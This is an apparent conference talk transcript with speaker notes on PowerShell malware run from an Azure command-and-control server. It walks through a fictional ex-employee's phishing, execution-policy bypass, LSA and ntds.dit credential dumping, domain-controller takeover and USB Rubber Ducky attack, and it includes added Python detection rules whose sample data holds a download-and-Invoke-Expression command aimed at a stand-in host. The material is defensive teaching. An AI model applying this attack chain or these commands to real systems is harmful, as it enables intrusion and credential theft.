Published by Valerie Gilbert. Modified over 7 years ago.
Slide 1: Windows Azure and PowerShell powered malware, by Kieran Jacobsen

What!

Hello everyone, my name is Kieran Jacobsen. I work for HP Enterprise Services as an Application Engineer; I started there almost 12 months ago, just a week before the last Infrastructure Saturday. This presentation is simply titled "What!". It is a simple title, and it sums up what most people will exclaim when discovering malware on a computer system. How many of you have found malware and exclaimed "WTF?", "what the hell?" or just "What?" The aim of this session is for you to gain some ideas on how someone could get malware into your network, escalate their access and their privileges, and then finally cause some serious damage. The example covered today is an insider threat, but a lot of what is covered also applies to APTs (advanced persistent threats) and, of course, the emerging hacktivist threats.
Slide 2: Malware IS DANGEROUS

The following story is fictional and does not depict any actual person or event. Although inspired by true events, the network, people and company described are completely fictional. Whilst the source code shown today is publicly available, I hold no responsibility for any loss or damage that may arise from you using or manipulating the source code. Everyone involved in this presentation is a trained IT professional, so please, don't try this at home!

I am adding some disclaimers here. The scenario described today is based on a number of my past experiences, as well as those of other IT professionals. The network in use probably resembles thousands of IT environments around the world; it doesn't reflect on anyone specifically. Be careful with my source code, it can be very dangerous; the source code is on GitHub. If you infect your machine with it and it talks to my C&C infrastructure, it could end up running malicious commands. The C&C will be down by the end of the day, but I am still going to warn you all. I really hope you will all go and take a look at the code and the information I have posted up. Now that I have the disclaimer out of the way, let's get on with the presentation.
Slide 3: The Bad Guy

Name: Boris
Previous Title: System Administrator, Queensland Department of Widget Management
Technical Skills: PowerShell, Group Policy, Windows Azure, some hacking knowledge

Meet Boris; hopefully you recognise him from GoldenEye. Boris was working for the Queensland Department of Widget Management as a system administrator. The department unfortunately had to lay some staff off due to cutbacks, and Boris was selected to go. This has made him angry, very angry; he has sworn revenge against the department and his former colleagues. If you look at his technical skills, he is like any other IT professional. Another thing to note is that he went to TechEd, where he picked up some cloud skills and new PowerShell skills. So, bent on revenge, he goes off and writes some malware.
Slide 4: The Malware

- Written in PowerShell. IT IS VERY OBVIOUS!
- Signed by an SSL certificate issued by a 3rd party root authority
- A machine is considered infected when: C:\Infected contains the required files; the drive infection scheduled task is running; the C&C scheduled task is running
- Command and Control is cloud based: uses a Windows Azure VM Role, Windows Server 2012 with IIS and WebDAV

Boris has decided to use PowerShell for the entirety of his malware. As malware goes, his is pretty obvious: during the infection process it is obvious something bad is happening, and once infected, all the files for the malware are stored in a directory called Infected. The PowerShell scripts for the malware are signed, that is, they have Authenticode signatures. Boris has a code signing certificate, issued by a 3rd party authority which the department's systems trust. We will talk about the signing later on. A machine is considered infected when there is a folder on the system drive called Infected containing the various files needed for the malware, and the scheduled task for communicating with the command and control infrastructure has been created. If everything works, and the victim's PC talks successfully with the command and control infrastructure, then a picture of Boris will appear in the ProgramData folder. Now, you have probably heard about cloud and Azure quite a bit today, and thought I wouldn't be mentioning it here; you're wrong. We are hosting the command and control infrastructure on Azure using the VM worker role.
Slide 5: The Malware: Infect-WebPC.ps1

- Infects a client
- Clients download and execute the script
- Downloads other files for infection, creates scheduled tasks to communicate with Command and Control

Infect-WebPC.ps1 is the script that does all the naughty work, infecting users' computers. Boris will socially engineer victims into running this script; once it is run, it will download other files and set up scheduled tasks to talk to the command and control server.
Slide 6: The Malware: Invoke-CandC.ps1

- Runs as a scheduled task
- Uploads a "registration" file to the Command and Control server; the file contains running processes and services
- Gets "Commands" from the Command and Control server, filters out tasks previously run, or those not destined to run on this host
- Runs each command using Invoke-Expression
- Commands can be an executable or any PowerShell command

Invoke-CandC.ps1 is the most important script of them all. It is run as a scheduled task, as the SYSTEM user, and it does all of the work today. When executed, it uploads details of the victim's PC to the command and control server, such as the services and running processes. It will then get a list of commands from the C&C server. A particular command will only ever be run once; if it fails to run, it will be tried again later. Boris can filter commands to run on specific victim computers, allowing him to perform specific commands and attacks on specific computers. A command can be any valid PowerShell expression; the expression could be an executable or a PowerShell script.
Slide 7: A Quick Note: Code Signing

- Authenticode/code signing only ensures us of the authenticity and integrity of the signed file/script/executable
- Does not prove good intentions
- Due to its crypto basis, more trusted by technically minded users
- Many sources of abuse: forgery, deception, theft
- See also: abused-to-sign-5000-malware-apps/

This is the first of two technical notes in this presentation, and I just briefly want to talk about code signing. You have to realise that Authenticode, or code signing, only ensures the authenticity and integrity of what it is protecting, that is, the application or script. It is merely a guarantee of the origin, not perfect proof of the origin, but more importantly it is a guarantee that the code has not been tampered with. Nowhere does it authenticate that the author only had good intentions; it does not protect against authors with malicious intentions. There is a common misconception that signed code is more trustworthy than an unsigned piece of code, and this raises the issue that users, even those who are very technically minded, might ignore other obvious warning signs. This over-trust of signing extends to antivirus companies, who are known to skip scanning signed files! There are many ways to abuse the Authenticode/code signing systems we have in place. Methods include: copying signing information, using self-signed certs, forging the MD5 sums or using collisions, getting some sucker to sign it, stealing a signing cert, compromising someone else's signing infrastructure (this is something that recently occurred to Adobe), and finally we could simply spend the money, buy a cert and be evil with it. I am not saying we should ditch this, but we need to improve the situation. Let's get back to the scenario.
Slide 8: The Network

- Simple, flat network
- Limited outbound protocols allowed: HTTP, HTTPS, DNS
- Single Windows Server 2012, running DC and File and Print
- Windows 7 SOE
- All users local administrators
- UAC was disabled due to an application compatibility issue
- VNC runs on all machines, as a service account, which is a domain admin

The department has a very simple network. They have a pfSense firewall filtering their outbound internet; it only allows HTTP, HTTPS and DNS out. It doesn't provide any URL scanning or filtering and doesn't log anything. There is a single Windows 2012 server running DC and file and print services. The standard operating environment at the department is Windows 7; all users have local admin on their PCs, and UAC was disabled due to application compatibility issues. There is a "management service", TightVNC server, running as a service account on every workstation; unfortunately the account is a member of Domain Admins. We all know this shouldn't be happening, but in a lot of environments System Center, or whatever monitoring or management tool is running, will either have quite high privileges or be running as a domain admin.
Slide 9: What Boris Knows

- Usernames, computer names, IP addressing…
- Security and firewall policies
- That passwords have all been changed
- Group Policy restrictions – PowerShell execution policies
- Personal details of those remaining: email addresses, pets and favourite animals, hobbies and interests

So what does Boris know of his target? Well, he worked there, so he knows a lot, quite a scary amount, but it really only gives him a slight advantage. He knows all the simple things: usernames, computer and server names, etc. He also knows quite a lot about how his victim will respond to an attack; he knows the security, password and firewall policies. In the department, they change all of the passwords when someone leaves. Because they have a simple network, they achieve a 100% password change. This is something that most organisations do not achieve, either because of laziness, fear, or incompetence. The biggest excuse with this one is "something might break if we change the password". Boris worked on the Windows 7 SOE, so he knows how the workstation environment works, in particular the Group Policy in use and what PowerShell execution policies have been configured on each workstation. The last thing is that he knows his former colleagues. He knows their addresses and their personal lives, or at least parts of their personal lives; he knows what they like and dislike, their pets and favourite animals, their hobbies and interests. Unlike an outsider, Boris doesn't have to spend time researching his targets; he got all the information he needs simply from turning up to work. He will use this knowledge to perform social engineering attacks on his former colleagues.
Slide 10: The Plan of Attack

- Infect previous co-workers: Alice, his former boss; Bob, the co-worker he didn't like; Eve, the paranoid security administrator; Jane, the C-level exec
- Get a Domain Admin account username and password
- ?
- Profit!

So what is Boris' plan of attack? Step 1, get his malware onto as many end user workstations as possible. Do this by sending specially crafted spear phishing emails to each victim, convincing them to run the Infect-WebPC script. Each victim might need a different strategy. One intended victim, Jane, doesn't use email! Boris is going to need something special to infect her PC. Step 2, get a domain admin account. Boris knows that TightVNC is installed on all of the workstations, that it is running as a user account, and that the account is a domain admin. He needs that password! Step 3, something. Step 4, profit!
Slide 11: A Quick Note: PowerShell Execution Policies

There are 6 states for the execution policy:
- Unrestricted: all scripts can run
- Remote Signed: no unsigned scripts from the Internet can run
- All Signed: no unsigned scripts can run
- Restricted: no scripts are allowed to run
- Undefined (default): if no policy is defined, then default to Restricted
- Bypass: the policy processor is bypassed

Here is the second of the technical notes; let's talk execution policies. As you all know, the execution of PowerShell scripts is governed by the execution policy. This policy has 6 different states. First we have Unrestricted; this is the least secure state and allows us to run any script, no matter where it came from. Then we have Remote Signed: if a script came from a source other than the local PC, it must be signed; any script from, say, the internet which is signed will be executed. Then we have All Signed; here we will not run any script, no matter the source, unless it has been signed. Then there is Restricted; in this state, no scripts can run. There are two special states: Undefined, which is the policy if none has been set, and which actually defaults to the Restricted policy; and finally Bypass, which is primarily used when calling PowerShell scripts from applications, and in which the policy processor is, well, bypassed. Another important note: depending on where the policy has been set, you can override the active policy with one of your own choosing. This is dependent on how the policy was set, though. Let's go to some demos.
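To make the "depends on where the policy was set" point concrete, here is an added example (not code from the presentation or its GitHub project) that models how PowerShell resolves the policy it enforces across its scopes, and applies it to the three demo workstations; the scope tables for Alice, Bob and Eve are constructed from the scenario.

```python
"""Model of how PowerShell picks the execution policy it enforces.

Added example; this is not code from the presentation or its GitHub
project. It encodes the scope precedence PowerShell applies (the order
Get-ExecutionPolicy -List prints them in) so the three demo workstations
can be reasoned about: Alice (nothing set anywhere), Bob (Group Policy
RemoteSigned) and Eve (Group Policy Restricted).
"""
from typing import Dict

# Scope precedence, highest first. MachinePolicy and UserPolicy are the two
# scopes Group Policy writes; Process is what `powershell.exe
# -ExecutionPolicy <x>` sets for that single process.
SCOPES = ("MachinePolicy", "UserPolicy", "Process", "CurrentUser", "LocalMachine")
POLICIES = {"Unrestricted", "RemoteSigned", "AllSigned", "Restricted",
            "Bypass", "Undefined"}
# Policy used when every scope is Undefined (Windows 7 / client SKUs of the
# talk's era; newer Windows Server releases default to RemoteSigned instead).
DEFAULT_POLICY = "Restricted"


def effective_policy(scopes: Dict[str, str]) -> str:
    """First non-Undefined scope in precedence order, else the default."""
    for scope in SCOPES:
        value = scopes.get(scope, "Undefined")
        if value not in POLICIES:
            raise ValueError(f"unknown policy {value!r} in scope {scope}")
        if value != "Undefined":
            return value
    return DEFAULT_POLICY


def with_process_override(scopes: Dict[str, str], requested: str) -> str:
    """Effective policy after `powershell.exe -ExecutionPolicy <requested>`.

    The switch only populates the Process scope, so a Group Policy value in
    MachinePolicy or UserPolicy still wins. That is why the Alice demo could
    simply ask for Unrestricted while Eve's enforced Restricted policy had to
    be sidestepped another way.
    """
    overridden = dict(scopes)
    overridden["Process"] = requested
    return effective_policy(overridden)


def script_file_allowed(policy: str, signed: bool, remote: bool) -> bool:
    """Whether a script *file* may run under `policy`.

    This models files only: the talk shows that Restricted does not stop a
    script's text from being handed to Invoke-Expression as plain commands.
    """
    if policy in ("Unrestricted", "Bypass"):
        return True
    if policy == "RemoteSigned":
        return signed or not remote
    if policy == "AllSigned":
        return signed
    return False  # Restricted, or Undefined resolving to Restricted


# Constructed scope tables for the three workstations in the scenario.
ALICE: Dict[str, str] = {}               # no Group Policy applied at all
BOB = {"MachinePolicy": "RemoteSigned"}  # departmental default via GPO
EVE = {"MachinePolicy": "Restricted"}    # the security admin's own setting

if __name__ == "__main__":
    for name, table in (("Alice", ALICE), ("Bob", BOB), ("Eve", EVE)):
        eff = effective_policy(table)
        forced = with_process_override(table, "Unrestricted")
        print(f"{name}: effective={eff}; after -ExecutionPolicy Unrestricted"
              f"={forced}; signed internet script file runs="
              f"{script_file_allowed(eff, signed=True, remote=True)}")
```

The practical check is the same on a real workstation: if MachinePolicy or UserPolicy shows anything other than Undefined in Get-ExecutionPolicy -List, the command-line override is ineffective.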
Slide 12: Demo: Boris infects Alice's PC

Alice was Boris' manager. Out of everyone in the department, Boris knows she will be an easy target. During the Windows 7 project, she managed to convince people that she didn't need any Group Policy applied; this means that her PowerShell signing policy will be undefined and hence restricted. Let's go and look at her execution policy. *Show get-executionpolicy –list* As you can see, she has no policy defined, which means she really has *show get-executionpolicy* Restricted as her policy. Boris sends her the targeted email, something about a dancing cat. She runs the code he copied in. *Show and then run code* This code is simply downloading and running a script; when we run PowerShell using this command we are telling PowerShell to use an execution policy of Unrestricted. We can do this, as there is no Group Policy enforcing an execution policy. You can see the machine has checked in, and processed some commands. *show boris image, and the checkin file* *Save Alice PC state and power on Bob's PC* On to the next victim, Bob.
Slide 13: Demo: Boris infects Bob's PC

Bob is the next victim. Unlike Alice, he has the default company policy of Remote Signed PowerShell scripts, not that it helps him. Remember I mentioned that Boris has a signing certificate! Just to show you I am not lying, here is the policy. *show get-executionpolicy –list* Bob got an email from Boris, this time about an Easter egg in Windows 7. The code is simpler this time, as we don't need to specify an execution policy; Remote Signed works perfectly for us. *show and then running the code* You can see the machine has checked in, and processed some commands. *show boris image, and the checkin file* Things are not going well for the department; let's look at Eve's PC. *save state of Bob's PC, start Eve's*
Slide 14: Demo: Boris infects Eve's PC

Eve is the next candidate. She has a policy enforcing the Restricted execution policy. This isn't going to help. Just to check, here is the policy. *show execution policy* Boris sends her an email about a kitten, and she of course runs this rather large chunk of code. *show and code execution* Once again it has checked in and we have an image of Boris on the system. *show image* *save Eve, power on Alice*
Slide 15: Code: Bypassing Restricted Execution Policy

Before we go any further, I want to explain the code Eve just ran. *show PrimalScript window* Just like previously, we are asking PowerShell to download the script, but this time we are reading the script file and then performing some very interesting things: we filter out comments, rearrange the entire script into a single line and then use Invoke-Expression. Why are we doing all of this? Well, if you do this, Windows and PowerShell think you are running commands and not a script; hence, that Restricted execution policy is useless. The scheduled tasks on all of the machines are performing similar things to this, just to ensure nothing stops them from running.
Slide 16: Demo: Boris gets a domain admin username and password

We are now going to go back to Alice's PC; from here Boris will perform some privilege escalation activities. Boris, as we said earlier, knows that there is the TightVNC service on the workstations, and he knows it is running under an account which is a member of the Domain Admins. He knows which account this is; if he didn't, it would only take a few minutes to find out, and if I had time, I would have shown you how easy this is. For an attacker, finding which services are running under user accounts is very simple, but not very exciting. Onward to the cool part of this demo. Boris decides to use a very nifty tool called PWDUMPX. This tool can be found online, and allows us to dump a number of different password storage locations in Windows; the one that Boris is after is the LSA store, because that's where passwords for services are stored. He will put the following commands into the C&C command list. *show commands on C&C server* What we are doing is getting Alice's PC to download the application and its dependencies and run the application; it will then upload the file we need, which has the password in it. *add files to C&C command list, switch to Alice's PC* I am just going to disable the C&C task and switch to an Unrestricted policy; I am doing this to save some time. I will then invoke the C&C manually so you can watch it performing the tasks at hand. *once complete, show uploaded files* So we have the file, and if we look in it, scrolling to the bottom, we see tvnc and there is this text filled with dots beside it; well, that text, minus all the full stops, is the password for the log-on-as-a-service account. So now we have a username, vnc, and a password, S3rvice. Boris is doing quite well. Now let's see if we can use this domain admin user to get access to the domain controller for the department.
Slide 17: Demo: Boris infects the server

It would be hard for Boris to get one of his colleagues to run code on the domain controller for him, like they did on their workstations, but he really doesn't need them to. He already has domain admin; all he needs to do is copy the infection files to the server, something he can do with Windows file sharing, and then get the scheduled tasks to run, which he can also do. Schtasks, which the infection process uses to create the local tasks, works well over the network; the script Boris wrote to infect his original victims only needs a minor bit of modification to make it target a remote machine. Let's head back to the C&C server and look at these commands. *switch to C&C* Here we can see that they are downloading a PowerShell script and then running it, specifying the username and password we found earlier and the remote host name we wish to target. *place commands in C&C file* Let's go back to Alice's PC and invoke the command and control. *invoke C&C on Alice* Let's check in and see if we have been successful. *go back to C&C and wait for check-in* And now, we have access to the domain controller! Boris has come quite a long way.
Slide 18: Demo: Boris cracks open AD

What can Boris do with this new-found access? How about getting some additional user accounts? If we could get a dump of the password hashes from AD, then we could crack those hashes. Firstly, we need a copy of the ntds.dit file we can access; that's easy, VSS and ntdsutil will help us there. Then we need to get a dump of those hashes; for that we will use Quarks PwDump. Finally we need to crack the hashes; let's use cloudcracker.com to do that. Here are some commands for the command and control that I prepared earlier. *show C&C commands quark.txt* There are quite a few here, so let's quickly run through them: we begin by getting a copy of Quarks PwDump onto the server, we then make a VSS snapshot and copy ntds.dit, and then remove the snapshot. We will then run Quarks against the database copy. Once that is done, upload the results to the C&C server. *disable scheduled task on server, invoke C&C on the server* *switch to C&C and show the upload* Now we need to crack those hashes; let's open up a browser and go to cloudcracker.com. *show them Cloud Cracker*
Slide 19: Cloud Cracker Results

I have some results I prepared earlier. It's interesting to see that we didn't get as many passwords as I hoped, but we did get a few: one we already knew, but now we know a few more. We can see that Boris got the administrator account password, and Bob's password. I am perplexed that Alice and Eve's passwords were not… Boris can now do whatever the hell he wants. Mission complete. I have one more interesting demo to show you before we finish…
Slide 20: Malicious HID Devices

- HID: Human Interface Device; examples generally include mice, keyboards, fingerprint readers, joysticks, webcams, gamepads
- Device shown today: Hak5 USB Rubber Duckie
- Retails for USD 60
- Contains a micro SD storage card and a 60MHz CPU
- When placed in a plastic case, will appear like any other USB device
- Appears as a HID keyboard, bypassing USB storage controls
- Simple programming language, can do anything you could do with a keyboard
- Cross platform

Let's talk malicious HID devices. HIDs, or human interface devices, are found all over the workplace; they are our USB keyboards, mice and webcams. Their drivers are universal and included in Windows, Mac and Linux. A malicious HID device is one which has been programmed to act like one type of HID device, say a keyboard, but in reality is far from it. For today's presentation, I am using a programmable HID device produced by the Hak5 team, which goes by the name USB Rubber Duckie. The Duckie isn't an ordinary HID; it features a micro SD card and a 60MHz processor, and is backed by a very simple scripting language. All of this is packed into a small plastic case which makes it easily confused with a normal USB thumb drive. The scripting language allows you to do anything a keyboard can do, from stealing data, to opening backdoors, to downloading and running executables and scripts.
Slide 21: Demo: Boris goes for complete domination, infects Jane's PC

As I mentioned earlier, there was one more intended victim of Boris: Jane. Jane doesn't read email, but she is known to be a collector of USB thumb drives. She buys them when they are on special, and is always getting one as a gift at a conference or in the mail. She is even known to find them on the street. Boris will use this to his advantage. Let's assume he has either sent a USB thumb drive to Jane, packaged as a fake gift from a vendor, or perhaps left it somewhere where she will find it. Naturally, she will plug it in to her computer. For the demo I will be using this PC here, the TechEd netbook, which is set up in a similar fashion to the department's PCs. *plug Duckie in and go* Look ma, no hands… *show this PC as infected (show Boris image)* Cool or what?
Slide 22: So what do we do?

- Boris never made a connection to the network; it always connected to his PC
- Boris could have easily done this with a significant level of anonymity
- PowerShell execution policies
- URL white listing
- Application white listing
- Email filtering
- USB device control
- Solution: user education

My final slide before questions. So what do we do? Well, I need to first point out that Boris never made a connection into the department's network; he could have easily done this with a significant amount of privacy/anonymity, such that it would have been difficult to find the culprit. Of course, he did use his personal email address, but he could have easily used some other social engineering tactic. Enforcing a PowerShell execution policy might be your best bet. When I was working on this presentation, the only policy that gave me some difficulty was All Signed. With All Signed enabled, users get prompted when they run a script from an unknown script publisher, even if the publisher is using a trusted certificate. This is probably the best defence against the "dark arts", but the method I used to bypass the Restricted policy should also work here; I just ran out of time. Enforcing a PowerShell execution policy can break your own scripts, or require you to sign all of your scripts. You could block PowerShell from executing, but I suspect that would make it harder for you to manage your environment in the long term. White listing the URLs users can go to, and the applications they run, will help, but there are ways of bypassing those as well. Besides, I only used two .exe files for the entire demo; the rest of the time it was PowerShell scripts and expressions. Email filtering isn't going to help: if Boris realised his emails were not getting through, he would have found another way. USB device management software and systems would also not help protect Jane; they will still allow a USB keyboard to work, and after all that is what she plugged in to her computer.

The real solution is user education. Users need to be more aware of what they click on and run in their email, and be more aware that USB devices are dangerous.
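Policy and education aside, the behaviours the demos rely on are also visible to a defender who is logging process creation. The following is an added example (not code from the talk or its GitHub project) that runs three detection rules over a constructed set of command-line records; the hostnames, usernames and the c2.invalid URL are made up.

```python
"""Detection rules for the PowerShell tradecraft this talk demonstrates.

Added example; not part of the presentation or its GitHub project. It scans
process-creation style records (a constructed sample is embedded below; in
practice they would come from Sysmon, event 4688 or PowerShell logging) for
the behaviours the demos depend on and the defences slide targets.
"""
import re
from typing import Dict, List

RULES = {
    # powershell.exe -ExecutionPolicy Unrestricted/Bypass (the Alice demo):
    # only useful to an attacker when no Group Policy enforces a policy.
    "weak-execution-policy": re.compile(
        r'-(?:ep|ex|exec|executionpolicy)\s+(?:unrestricted|bypass)', re.I),
    # text pulled off the network and handed to Invoke-Expression, the way
    # the Eve demo sidestepped an enforced Restricted policy
    "download-to-iex": re.compile(
        r'(?=.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b)'
        r'(?=.*\b(?:invoke-expression|iex)\b)', re.I | re.S),
    # schtasks registering a task that launches PowerShell as SYSTEM, which is
    # how the C&C script is kept running on an infected machine
    "system-task-runs-powershell": re.compile(
        r'schtasks(?=.*/create)(?=.*/ru\s+(?:"?nt authority\\)?system\b)'
        r'(?=.*powershell)', re.I | re.S),
}

# Constructed sample; hostnames, users and the c2.invalid URL are made up.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WKS-ALICE", "user": "alice",
     "cmd": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"host": "WKS-BOB", "user": "bob",
     "cmd": "schtasks /query /tn \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
    {"host": "WKS-ALICE", "user": "alice",
     "cmd": "powershell.exe -ExecutionPolicy Unrestricted -Command \"<pasted one-liner>\""},
    {"host": "WKS-EVE", "user": "eve",
     "cmd": "powershell.exe -Command \"$s=(New-Object Net.WebClient)"
            ".DownloadString('http://c2.invalid/s.ps1'); Invoke-Expression $s\""},
    {"host": "WKS-EVE", "user": "eve",
     "cmd": "schtasks /create /tn CandC /tr \"powershell.exe -File "
            "C:\\Infected\\Invoke-CandC.ps1\" /sc minute /mo 5 /ru SYSTEM"},
]


def match_rules(cmd: str) -> List[str]:
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per event that trips at least one rule."""
    findings: List[Dict[str, object]] = []
    for ev in events:
        hits = match_rules(ev["cmd"])
        if hits:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "rules": hits, "cmd": ev["cmd"]})
    return findings


def hosts_with_persistence(findings: List[Dict[str, object]]) -> List[str]:
    """Hosts where a SYSTEM PowerShell task was registered: the ones to check
    for a C:\\Infected folder and a running C&C task (the talk's indicators)."""
    return sorted({str(f["host"]) for f in findings
                   if "system-task-runs-powershell" in f["rules"]})


if __name__ == "__main__":
    results = scan(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['host']}\\{f['user']}: {', '.join(f['rules'])}")
    print("hosts to triage for persistence:", hosts_with_persistence(results))
```

The benign inventory script and the schtasks /query record in the sample are there to show the rules stay quiet on ordinary administration, which is what keeps such detections usable in a flat network like the department's.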
Slide 23: Questions? More Info…

Website: http://aperturescience.su
Twitter: @kjacobsen
GitHub Project:
Tools:
- PwdumpX:
- Quarks PW Dump:
- Cloudcracker.com:
- Usb rubber duckie:
- Hak5:

So we have reached the end of this presentation. I would like to thank you all for attending; please fill out the feedback forms. I have a number of important links on this slide: my website, aperture science dot su, my Twitter handle, my email address, links to the GitHub project, as well as links to the tools in use.